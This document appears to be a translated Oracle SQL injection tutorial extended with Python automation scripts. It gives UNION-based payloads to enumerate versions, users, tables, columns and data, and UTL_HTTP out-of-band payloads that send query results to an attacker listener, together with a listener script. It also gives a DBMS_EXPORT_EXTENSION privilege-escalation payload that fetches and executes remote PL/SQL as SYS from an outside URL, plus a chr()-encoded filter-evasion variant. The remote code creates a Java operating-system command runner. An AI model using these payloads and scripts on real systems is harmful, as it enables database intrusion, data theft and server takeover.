① Determine whether the backend is an Oracle database:
and 0<>(select count(*) from dual)
If the normal page comes back, the backend understands Oracle's DUAL table and is treated as Oracle. Caveat: MySQL also accepts "from dual", so confirm with something Oracle-specific such as the sys.v_$version or sys_context queries used below.
② Guess the number of columns:
Submit order by N (or group by N) with increasing N until the error page appears; the last N that still returns the normal page is the column count of the injected query.
③ Confirm the column count, for example for six columns:
and 1=1 union select null,null,null,null,null,null from dual--
Oracle does not convert types implicitly in a UNION (a mismatch raises ORA-01790), but null is compatible with every type, so once the count is right this submission returns the normal page without an error.
To find the type of each column, wrap the null in that position in quotes ('null', a character literal). If the page is still normal, the column is a character type; if an error comes back, it is not character and is most likely numeric (put an unquoted number such as 1 there; if that errors too, the column is some other type such as DATE).
For example, with columns 2, 4 and 6 being character columns: and 1=1 union select null,'null',null,'null',null,'null' from dual--
This is why the payloads below put numbers in positions 1, 3 and 5, quoted literals in positions 4 and 6, and the string-returning subquery in position 2.
④ Read the Oracle version:
Put the subquery in the echoed column (the one whose value is displayed on the page) and switch to and 1=2 so that only the UNION row is shown:
and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),3,'4',5,'6' from dual--
⑤ Read the user of the current database connection:
and 1=2 union select 1,(select sys_context('userenv','current_user') from dual),3,'4',5,'6' from dual--
⑥ Infer the operating system of the database server:
and 1=2 union select 1,(select member from v$logfile where rownum=1),3,'4',5,'6' from dual--
This returns the path of a redo log file; a path such as C:\oracle\... versus /u01/app/oracle/... tells Windows from Unix and also reveals the Oracle installation directory. Ordinary application accounts usually cannot read v$ views (that needs SELECT_CATALOG_ROLE or similar), so this query may fail where the earlier ones work.
⑦ Read table names:
and 1=2 union select 1,TABLE_NAME,3,'4',5,'6' from USER_TABLES--
USER_TABLES lists only the tables owned by the connected user; ALL_TABLES (which adds an OWNER column) shows every table the user can access. When the page displays only one row, add where rownum=1 and then exclude each name already seen with TABLE_NAME<>'...' to step through the list.
⑧ Read the column names of a table:
and 1=2 union select 1,COLUMN_NAME,3,'4',5,'6' from COLS where TABLE_NAME='TABLE_TO_READ'--
COLS is a synonym for USER_TAB_COLUMNS. Names in the data dictionary are stored in upper case, so the table name in the condition must be written in upper case exactly as the dictionary holds it.
⑨ Read the data in a column of that table:
and 1=2 union select 1,COLUMN_TO_READ,3,'4',5,'6' from TABLE_TO_READ--
If the column is not a character type, wrap it in to_char() so that it fits the character position of the UNION.
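Steps ② to ⑨ are one procedure: find the column count with null rows, type each position with a quoted or numeric literal, then build the extraction payload around the first character column. The following Python script is an added example (not code from the original page) that automates exactly that. The web target is replaced by a constructed stand-in, simulated_target, which applies Oracle's UNION type rule to a hypothetical six-column query; on a real engagement is_normal would send the payload and compare the HTTP response against the normal page.

```python
"""Oracle UNION-based column enumeration (steps 2 to 9): payload builder plus
a constructed simulated target so the logic can be exercised offline.
Added example; the target and its column layout are assumptions."""
from typing import Callable, List

NormalPageCheck = Callable[[str], bool]   # payload -> True if the normal page came back


def union_payload(values: List[str], condition: str = "1=2", table: str = "dual") -> str:
    """Build `and <cond> union select v1,v2,... from <table>--`."""
    return f"and {condition} union select {','.join(values)} from {table}--"


def count_payload(ncols: int) -> str:
    """Step 3: an all-null row; Oracle accepts NULL in every column position."""
    return union_payload(["null"] * ncols, condition="1=1")


def probe_payload(ncols: int, position: int, literal: str) -> str:
    """Step 3 type probe: one typed literal ('null' for CHAR, 1 for NUMBER) at `position`."""
    values = ["null"] * ncols
    values[position] = literal
    return union_payload(values, condition="1=1")


def infer_columns(is_normal: NormalPageCheck, max_cols: int = 20) -> List[str]:
    """Return the type of each column of the injected query: 'char', 'number' or 'other'."""
    ncols = next((n for n in range(1, max_cols + 1) if is_normal(count_payload(n))), None)
    if ncols is None:
        raise RuntimeError(f"no column count up to {max_cols} returned the normal page")
    types = []
    for pos in range(ncols):
        if is_normal(probe_payload(ncols, pos, "'null'")):
            types.append("char")
        elif is_normal(probe_payload(ncols, pos, "1")):
            types.append("number")
        else:
            types.append("other")   # e.g. DATE: neither literal is UNION-compatible
    return types


def extraction_payload(types: List[str], subquery: str, table: str = "dual") -> str:
    """Steps 4 to 9: place a string-returning subquery in the first CHAR column and
    fill the others with literals of the right type (i for NUMBER, 'i' for CHAR)."""
    values, placed = [], False
    for i, t in enumerate(types, start=1):
        if t == "char" and not placed:
            values.append(f"({subquery})")
            placed = True
        elif t == "char":
            values.append(f"'{i}'")
        elif t == "number":
            values.append(str(i))
        else:
            values.append("null")
    if not placed:
        raise ValueError("no character column available to display a string result")
    return union_payload(values, table=table)


def split_top_level(select_list: str) -> List[str]:
    """Split a select list on commas that are outside parentheses and quotes."""
    parts, depth, quoted, cur = [], 0, False, ""
    for ch in select_list:
        if ch == "'":
            quoted = not quoted
        elif not quoted:
            depth += (ch == "(") - (ch == ")")
            if ch == "," and depth == 0:
                parts.append(cur)
                cur = ""
                continue
        cur += ch
    parts.append(cur)
    return parts


# Constructed stand-in for the vulnerable page (assumption: the injected query
# has the given column types). Mimics Oracle's UNION rule: NULL matches any
# type, a quoted literal only CHAR, a bare number only NUMBER; a wrong count
# or a type mismatch (ORA-01790) yields the error page.
def simulated_target(column_types: List[str]) -> NormalPageCheck:
    compatible = {
        "char": lambda v: v.startswith("'"),
        "number": lambda v: v.isdigit(),
        "other": lambda v: False,
    }

    def is_normal(payload: str) -> bool:
        select_list = payload.split("union select ", 1)[1].rsplit(" from ", 1)[0]
        values = split_top_level(select_list)
        if len(values) != len(column_types):
            return False
        return all(v == "null" or compatible[t](v) for v, t in zip(values, column_types))

    return is_normal


if __name__ == "__main__":
    target = simulated_target(["number", "char", "number", "char", "number", "char"])
    kinds = infer_columns(target)
    print(kinds)
    print(extraction_payload(kinds, "select banner from sys.v_$version where rownum=1"))
```

With the six-column layout assumed above the script reproduces the page's own payload, and 1=2 union select 1,(select banner from sys.v_$version where rownum=1),3,'4',5,'6' from dual--, which is the check that the type inference landed the subquery in a character position.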
-----------
⑩ Check whether the UTL_HTTP package exists:
select count(*) from all_objects where object_name='UTL_HTTP'
Object names are stored in upper case, so a lower-case 'utl_http' always returns 0. A count greater than 0 only means the package is present; calling it also needs EXECUTE on UTL_HTTP and, from Oracle 11g on, a network ACL that allows the database to reach the listener host and port.
Extract data through UTL_HTTP (out-of-band injection):
The pattern is and UTL_HTTP.request('http://IP:2009/'||(query))=1-- : the query result is appended to the URL with the concatenation operator ||, and the database server itself makes an HTTP request to the attacker's listener, so the value shows up in the request line even when nothing is echoed on the page. Start the listener first (nc -l -vv -p 2009), then submit:
and UTL_HTTP.request('http://IP:2009/'||(select banner from sys.v_$version where rownum=1))=1--
and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where rownum=1))=1-- (shows the first schema owner)
and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where owner<>'FIRST_OWNER' and rownum=1))=1--
and UTL_HTTP.request('http://IP:2009/'||(select owner from all_tables where owner<>'FIRST_OWNER' and owner<>'SECOND_OWNER' and rownum=1))=1--
Notes: the OWNER column of ALL_TABLES is the schema (user) that owns the table, which write-ups of this kind often call the "database name". If the injection point sits inside a quoted string, prefix the payload with a closing quote ('). Values containing spaces or other characters not allowed in a URL should be escaped before being appended (for example with utl_url.escape). The trailing =1 only makes the expression syntactically valid: the request is sent when the function is evaluated, whatever the comparison result.
Enumerate the tables of a schema:
and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='SCHEMA' and rownum=1))=1--
and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='SCHEMA' and TABLE_NAME<>'FIRST_TABLE' and rownum=1))=1--
and UTL_HTTP.request('http://IP:2009/'||(select TABLE_NAME from all_tables where owner='SCHEMA' and TABLE_NAME<>'FIRST_TABLE' and TABLE_NAME<>'SECOND_TABLE' and rownum=1))=1--
Enumerate the columns of a table:
and UTL_HTTP.request('http://IP:2009/'||(select count(*) from user_tab_columns where table_name='TABLE'))=1-- (returns the number of columns, not a name)
Then one name per request:
and UTL_HTTP.request('http://IP:2009/'||(select column_name from user_tab_columns where table_name='TABLE' and rownum=1))=1-- (first column name)
and UTL_HTTP.request('http://IP:2009/'||(select column_name from user_tab_columns where table_name='TABLE' and column_name<>'FIRST_COLUMN' and rownum=1))=1--
select * cannot be concatenated into a string, so the column to return must be named. user_tab_columns covers only the connected user's tables; for another schema use all_tab_columns with an owner='SCHEMA' condition.
Read the values of a column:
and UTL_HTTP.request('http://IP:2009/'||(select COLUMN_NAME from TABLE_NAME where rownum=1))=1--
and UTL_HTTP.request('http://IP:2009/'||(select COLUMN_NAME from TABLE_NAME where COLUMN_NAME<>'FIRST_VALUE' and rownum=1))=1--
Each request excludes the values already received, so the rows are walked one per request; a numeric column is converted to a string by the concatenation automatically.
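The whole UTL_HTTP section is one loop: send a payload whose subquery excludes everything already received, read the value out of the callback, repeat. The script below is an added example (not code from the original page) that builds those payloads and replaces the nc listener with a small HTTP responder: it decodes the exfiltrated value from the request line and answers 200 OK so that UTL_HTTP.request returns normally on the database side instead of raising. The listener address 10.0.0.5 and the request bytes used in the comment are assumptions.

```python
"""UTL_HTTP out-of-band extraction: payload builder with the <> exclusion chain,
plus a listener that decodes each callback.  Added example; the listener IP is
an assumption and no real target is contacted when the module is imported."""
import socket
from typing import Iterable, List
from urllib.parse import unquote

LISTENER_IP = "10.0.0.5"   # assumed attacker address (the page writes it as IP)
LISTENER_PORT = 2009


def oob_payload(subquery: str, listener: str = LISTENER_IP, port: int = LISTENER_PORT) -> str:
    """and UTL_HTTP.request('http://IP:PORT/'||(subquery))=1--
    The database appends the single-row result to the URL and fetches it, so the
    value arrives in the request line of whatever listens on IP:PORT."""
    return f"and UTL_HTTP.request('http://{listener}:{port}/'||({subquery}))=1--"


def next_value_query(column: str, table: str, seen: Iterable[str], extra_where: str = "") -> str:
    """First row whose `column` is none of the values already received: the
    column<>'...' chain the page uses to walk owners, tables, columns and rows."""
    conds = [extra_where] if extra_where else []
    conds += [f"{column}<>'{v}'" for v in seen]
    conds.append("rownum=1")
    return f"select {column} from {table} where {' and '.join(conds)}"


def value_from_request(raw: bytes) -> str:
    """Pull the exfiltrated value out of the HTTP request line and URL-decode it.
    Constructed sample: b'GET /Oracle%20Database%2011g HTTP/1.1' -> 'Oracle Database 11g'."""
    request_line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    parts = request_line.split(" ")
    if len(parts) < 2 or not parts[1].startswith("/"):
        raise ValueError(f"not an HTTP request line: {request_line!r}")
    return unquote(parts[1][1:])


def receive_one(server: socket.socket) -> str:
    """Accept one connection, read the request headers, reply 200 OK and return
    the decoded value.  A valid reply matters: UTL_HTTP.request raises on a
    malformed response, which may surface as an error page and stop the loop."""
    conn, _ = server.accept()
    with conn:
        conn.settimeout(5)
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = conn.recv(4096)
            if not chunk:
                break
            data += chunk
        value = value_from_request(data)
        conn.sendall(b"HTTP/1.0 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok")
    return value


def listen(port: int = LISTENER_PORT, count: int = 1) -> List[str]:
    """Stand-in for `nc -l -vv -p PORT` that decodes `count` callbacks."""
    with socket.socket() as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", port))
        server.listen(5)
        return [receive_one(server) for _ in range(count)]


if __name__ == "__main__":
    # Walk the schema owners: print a payload, submit it at the injection point
    # while the listener waits, then exclude what came back and repeat.
    seen: List[str] = []
    for _ in range(3):
        print(oob_payload(next_value_query("owner", "all_tables", seen)))
        seen.append(listen()[0])
    print("owners seen:", seen)
```

The same loop enumerates tables (column "table_name", extra_where "owner='SCHEMA'"), columns (table "all_tab_columns") and row values by changing the arguments of next_value_query; nothing else in the exchange changes.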
Use SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES to run PL/SQL with SYS privileges:
The procedure is owned by SYS and runs with definer's rights, and its third parameter is concatenated into dynamic SQL, so PL/SQL injected there executes as SYS. The injected text closes the statement being built (DBMS_OUTPUT".PUT(:P1);), runs the attacker's code, and comments out the remainder (END;--):
and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE utl_http.request(''http://www.xx.com/1.txt'');END;--','SYS',0,'1',0)=0--
utl_http.request is a function, so a bare call to it is not a valid PL/SQL statement; its return value (the body of 1.txt, fetched by the database server) is handed to EXECUTE IMMEDIATE, which runs it. The single quotes around the URL are doubled because they sit inside the outer string literal.
If that submission comes back as an error page (typically because single quotes are filtered), build every string argument from chr() calls joined with || so the payload contains no quote at all. The encoded form of the same call follows (the page's chr(883) is a typo for chr(83), the S of DBMS, and the URL is the one the page encoded):
and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||
chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||
chr(117)||chr(116)||chr(108)||chr(95)||chr(104)||chr(116)||chr(116)||chr(112)||chr(46)||chr(114)||chr(101)||chr(113)||chr(117)||chr(101)||chr(115)||chr(116)||chr(40)||chr(39)||
chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(108)||chr(105)||chr(45)||chr(116)||chr(101)||chr(107)||chr(46)||chr(99)||chr(111)||chr(109)||chr(47)||chr(49)||chr(46)||chr(116)||chr(120)||chr(116)||
chr(39)||chr(41)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),
chr(83)||chr(89)||chr(83),0,chr(49),0)=0--
The remote file 1.txt holds the PL/SQL that is fetched and executed. Written out as a complete anonymous block (EXECUTE IMMEDIATE accepts a SQL statement or an anonymous block, not a bare PL/SQL statement, so the page's text is wrapped in begin/end and its garbled Java restored), it creates a Java stored source that runs an operating-system command; the PL/SQL wrapper that would call execCommand is not shown on the page:
begin
  execute immediate 'declare pragma autonomous_transaction; begin execute immediate ''create or replace and resolve java source named "JAVACMD" as import java.lang.*; import java.io.*; public class JAVACMD { public static void execCommand(String command) throws IOException { Runtime.getRuntime().exec(command); } }''; end;';
end;
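Hand-writing a chr()||chr() chain of that length is error-prone (the page's own encoded version contains chr(883) and drops the ".PUT part), so the following added Python helper (not code from the original page) encodes a string argument into the quote-free form, decodes a chain back to text for checking, and renders a whole procedure call with every string argument encoded and numeric arguments left as they are. The call it prints for the www.xx.com payload is an illustration built from the page's own argument list.

```python
"""Encode Oracle string literals as chr()||chr()... chains (no single quotes in
the payload) and decode them back for verification.  Added example."""
import re
from typing import List

_CHR = re.compile(r"chr\s*\(\s*(\d+)\s*\)", re.IGNORECASE)


def to_chr(text: str) -> str:
    """'FOO' -> 'chr(70)||chr(79)||chr(79)'; every character, quotes included,
    becomes one chr() call, so the result needs no quoting at all."""
    if not text:
        raise ValueError("an empty string cannot be expressed as a chr() chain")
    return "||".join(f"chr({ord(c)})" for c in text)


def from_chr(expr: str) -> str:
    """Inverse of to_chr; rejects anything that is not a pure chr()||chr() chain
    and flags codes above 255 (such as the page's chr(883)) as typos."""
    out: List[str] = []
    for term in (t.strip() for t in expr.split("||")):
        m = _CHR.fullmatch(term)
        if not m:
            raise ValueError(f"not a chr() term: {term!r}")
        code = int(m.group(1))
        if code > 255:
            raise ValueError(f"chr({code}) is not a single-byte character; probably a typo")
        out.append(chr(code))
    return "".join(out)


def encode_call(function: str, args: List[object]) -> str:
    """Render function(...) with every str argument as a chr() chain and every
    number as is: encode_call('f', ['FOO', 0]) -> 'f(chr(70)||chr(79)||chr(79),0)'."""
    rendered = [to_chr(a) if isinstance(a, str) else str(a) for a in args]
    return f"{function}({','.join(rendered)})"


if __name__ == "__main__":
    # Third argument of the DBMS_EXPORT_EXTENSION call from the page, with the
    # URL quotes single (they are no longer inside an outer literal).
    injected = "DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE utl_http.request('http://www.xx.com/1.txt');END;--"
    call = encode_call("SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES",
                       ["FOO", "BAR", injected, "SYS", 0, "1", 0])
    print("and " + call + "=0--")
    # Round-trip check before submitting anything.
    assert from_chr(to_chr(injected)) == injected
```

Decoding the chain from a write-up before reusing it is the cheap way to catch transcription damage: from_chr reports a non-chr term or an out-of-range code instead of silently producing a payload that the database will reject.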